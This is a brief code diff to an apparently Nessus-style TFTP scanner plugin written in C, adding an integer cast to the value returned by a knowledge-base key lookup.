@@ -100,7 +100,7 @@ PlugExport int plugin_run(struct arglist * env)
  struct timeval timeout = {10,0};
  int flag;
  
- flag = plug_get_key(env, "tftp/get_file");
+ flag = (int)plug_get_key(env, "tftp/get_file");
  if(flag)return(0);
   
  packet = (struct tftp_header *)p_packet;
